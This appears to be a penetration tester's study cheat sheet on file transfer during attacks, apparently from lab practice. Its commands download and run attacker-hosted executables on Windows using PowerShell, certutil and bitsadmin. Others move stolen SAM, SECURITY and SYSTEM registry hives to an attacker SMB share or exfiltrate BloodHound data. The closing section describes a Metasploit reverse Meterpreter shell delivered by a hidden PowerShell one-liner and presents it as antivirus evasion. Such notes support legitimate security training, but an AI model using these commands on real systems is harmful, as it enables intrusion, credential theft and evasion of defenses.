Uploading Shells/ Transferring Files

Transfer files with SSH (SCP)

Best to copy to tmp folder as there are no restrictions mostly

scp /opt/LinEnum.sh [email protected]:/tmp

scp [email protected]:/home/ubuntu/documents.txt notes.txt

Python server

python3 -m  http.server

basic http-Server

http-server -p 8080

Powershell downloading files

(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou
nd.ps1')

from cmd
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Certutil cmd windows

certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe

RDP with shared folder to transfer filer - xfreerdp

xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads

Download files from server to machine in Windows

bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt

SMB Files tranfer with impacket

start smb server on attacker machine

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

We can also use it without specifying username and password

ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

And now you can make aval this share on the windows system as a separate drive

controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.

And now you can transfer files to and fro from both machines.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 
        1 file(s) copied.

We can also directly move files without setting it as drive.

C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.

Evil-winrm

You can use upload and download command to transfer files

Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip
                                        
Info: Download successful!

Other web servers complete list

Getting a Meterpreter shell on a compromised Windows machine

exploit(multi/script/web_delivery)

exploit/: Indicates the use of a module designed to take advantage of a specific vulnerability or system configuration to execute code.
multi/: Signifies that the module is cross-platform and can target multiple operating systems (Windows, Linux, macOS).
script/: Specifies that the exploit delivers its payload via a script (like PowerShell, Python, or PHP).
web_delivery: The name of the module that hosts a payload on a temporary web server. When the victim executes a specific one-liner command, it fetches and runs the payload in memory.

Utility: PowerShell & Windows Reverse Meterpreter

The primary utility of this module is to gain a fileless reverse shell. Instead of sending an .exe file that might be caught by antivirus, you provide a single PowerShell command to the target system.

1. Usage for Windows Reverse Meterpreter

To use this for a Windows target, you would configure the module within Metasploit as follows:

Set Target: set TARGET 2 (This selects the PowerShell target, as seen in your screenshot where target => 2).
Set Payload: set PAYLOAD windows/x64/meterpreter/reverse_tcp
Set Local Host: set LHOST [Your_IP]
Execute: Type run or exploit.

2. Full Use with PowerShell

Once you hit run, Metasploit will generate a unique PowerShell "one-liner." It looks something like this: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -RunAs [Encoded_Command_String]

Why this is effective:

Antivirus Evasion: Because the payload is executed directly in memory via PowerShell, it never touches the hard drive, making it harder for standard antivirus programs to detect.
Simplicity: You only need a way to execute a single line of text on the victim's machine (e.g., via a compromised web server, a malicious shortcut, or a macro).

PreviousShells NextFootPrinting

Last updated 15 days ago

hashtagTransfer files with SSH (SCP)

hashtagPython server

hashtagbasic http-Server

hashtagPowershell downloading files

hashtagCertutil cmd windows

hashtagRDP with shared folder to transfer filer - xfreerdp

hashtagDownload files from server to machine in Windows

hashtagSMB Files tranfer with impacket

hashtagEvil-winrm

hashtagOther web servers complete list

hashtagGetting a Meterpreter shell on a compromised Windows machine

hashtagUtility: PowerShell & Windows Reverse Meterpreter